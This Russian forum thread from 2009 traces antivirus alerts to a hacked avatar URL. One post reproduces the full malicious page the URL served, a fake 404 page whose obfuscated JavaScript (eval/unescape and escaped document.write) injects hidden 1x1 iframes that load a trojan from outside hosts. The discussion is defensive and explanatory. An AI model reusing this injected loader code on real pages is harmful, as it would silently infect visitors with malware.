Версия для печати темы
Нажмите сюда для просмотра этой темы в оригинальном формате
Форум программистов > Флейм > Avast - реакция на открытие ветки о Vit`е


Автор: Riply 9.7.2009, 15:19
Вот что он выдал:
http://pic.ipicture.ru/uploads/090709/6LFRI1715H.jpg

Автор: Alexeis 9.7.2009, 15:47
Riply, уже неделю аvira вопит на 3 ветки форума. Я послал им как ложное, надеюсь что оно действительно ложное, потому что 2 антивируса это уже плохо...

Автор: Alexeis 9.7.2009, 16:05
  Шухер отменяется, пришел ответ
Цитата

The file '4605.html' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Detection will be removed from our virus definition file (VDF) with one of the next updates. 

Автор: azesmcar 9.7.2009, 16:07
при попытке открыть http://mvdr.ru/avatar.jpg Мозилла выдает Reported Attack Site!
Скорее всего и вправду вирус.

Автор: Alexeis 9.7.2009, 16:11
azesmcar, вирус с jpeg-e  smile . Я себе заблокировал этот файл тоже, но как jpeg может повредить чему либо?

Добавлено через 6 минут и 42 секунды
Епт ну и жпега
Код

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY><script>document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e));</script><script>eval(unescape("%76%61%72%20%63%39%36%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%31%2c%31%30%38%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%31%35%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%31%31%31%2c%31%31%32%2c%31%30%31%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%31%30%2c%31%30%35%2c%31%30%33%2c%31%30%34%2c%31%31%36%2c%31%31%32%2c%39%37%2c%31%31%34%2c%31%31%36%2c%31%32%31%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%63%39%36%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));</script>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at mvdr.ru
</ADDRESS>
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0073\u0072\u0063\u003d\u0022\u0020\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0067\u006c\u006f\u006e\u0064\u0069\u0073\u002e\u0063\u006e\u002f\u0069\u006e\u002e\u0063\u0067\u0069\u003f\u0032\u0022\u0020\u002f\u003e')</script><iframe frameborder=0 border=0 height=1 width=1 src="http://glondis.cn/in.cgi?3" /></body>
</HTML>

<!--
   - Unfortunately, Microsoft has added a clever new
   - "feature" to Internet Explorer. If the text of
   - an error's message is "too small", specifically
   - less than 512 bytes, Internet Explorer returns
   - its own error message. You can turn that off,
   - but it's pretty tricky to find switch called
   - "smart error messages". That means, of course,
   - that short error messages are censored by default.
   - IIS always returns error messages that are long
   - enough to make Internet Explorer happy. The
   - workaround is pretty simple: pad the error
   - message with a big comment like this to push it
   - over the five hundred and twelve bytes minimum.
   - Of course, that's exactly what you're reading
   - right now.
   -->



Добавлено через 9 минут и 20 секунд
azesmcar, усе, ссылка на аватару удалена с форума. 

Автор: azesmcar 9.7.2009, 16:24
Цитата(Alexeis @  9.7.2009,  16:11 Найти цитируемый пост)
azesmcar, вирус с jpeg-e  smile . Я себе заблокировал этот файл тоже, но как jpeg может повредить чему либо? 

Честно говоря я не совсем понял что там вообще происходит.  smile 

Автор: Данкинг 9.7.2009, 18:54
Цитата(Alexeis @  9.7.2009,  17:11 Найти цитируемый пост)
Я себе заблокировал этот файл тоже, но как jpeg может повредить чему либо?

Не знаю, но Аваст периодически на вирусы .jpg действительно ругается.

Автор: Vasay 9.7.2009, 19:17
Цитата(azesmcar @  9.7.2009,  16:24 Найти цитируемый пост)
Честно говоря я не совсем понял что там вообще происходит.



Примерно так: файла с jpg на сервере не было. Сервер отвечал страницей 404, на которой с помощью закодированного js открывался другой сайт в ifram-е ( ), который впаривал троян. 

Правда, я думаю, для пользователей vingrad-а это не представляло опасности, так как браузер ожидая получит jpg, получив 404 страницу не выполнял js на ней. (надеюсь, по крайней мере, на это)

Учитывая, что сайт с avatar.jpg принадлежит mvdr (судя по названию). Вероятней всего кто-то взломал его сервер. 

Автор: krundetz 9.7.2009, 19:59
насколько я в курсе, jpg может представлять угрозу для компьютеров под управлением windows и не только, если сделан определенным образом. По моему связано с реализацией самого алгоритма, ведет к переполнению буфера и вследствие возможности перехватить управление компьютером.

Автор: pycha 11.7.2009, 13:50
каспер тоже кстати ругался.

Автор: ТоляМБА 12.7.2009, 00:37
Цитата(krundetz @  9.7.2009,  21:59 Найти цитируемый пост)
jpg может представлять угрозу для компьютеров под управлением windows и не только

krundetz, опаснее твоего аватара только Хиросима

Автор: ConstantinXXX 12.7.2009, 11:39
Каспер тоже предупреждает. =)

http://s44.radikal.ru/i105/0907/4a/5cbad66b394d.jpg

Это и не джепег походу, а просто при обращении за аватаркой, скрипт возвращает джепег =)

Автор: Alexeis 12.7.2009, 12:20
Цитата(ConstantinXXX @  12.7.2009,  10:39 Найти цитируемый пост)
Это и не джепег походу, а просто при обращении за аватаркой, скрипт возвращает джепег =)

  Да где вы его находите? Удалили же.

Автор: bilbobagginz 12.7.2009, 14:39
Цитата(krundetz @  9.7.2009,  19:59 Найти цитируемый пост)
По моему связано с реализацией самого алгоритма, ведет к переполнению буфера и вследствие возможности перехватить управление компьютером. 

для защиты от переполнения буфферов в современных процах есть защита в железе, а в винде есть DEP (data execution prevention). 
Включите на все программы, и по крайней мере такого рода вирусы вам не страшны.

Автор: bems 12.7.2009, 16:21
Цитата(bilbobagginz @  12.7.2009,  14:39 Найти цитируемый пост)
для защиты от переполнения буфферов в современных процах есть защита в железе, а в винде есть DEP
Не у всех "современные" процы. Я вот исжу на п4\. где такой фичи нет. А DEP без аппаратной поддержки не рулит

Автор: krundetz 12.7.2009, 22:45
Цитата(ТоляМБА @  12.7.2009,  00:37 Найти цитируемый пост)
krundetz, опаснее твоего аватара только Хиросима

 smile аватарка сама невинность

Автор: pycha 13.7.2009, 02:21
невинность под тем , что на аватарке)))

Автор: Riply 13.7.2009, 10:43
Цитата(krundetz @  12.7.2009,  22:45 Найти цитируемый пост)
  аватарка сама невинность 


Розовый поясок в сочетании с зеленым 
в горошек - полное отсутствие вкуса smile
Я бы переодела (илив крайнем случае - раздела)  аватарку smile

Автор: pycha 13.7.2009, 13:25
Riply да что ты понимаеш? это новая мода такая))))))

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)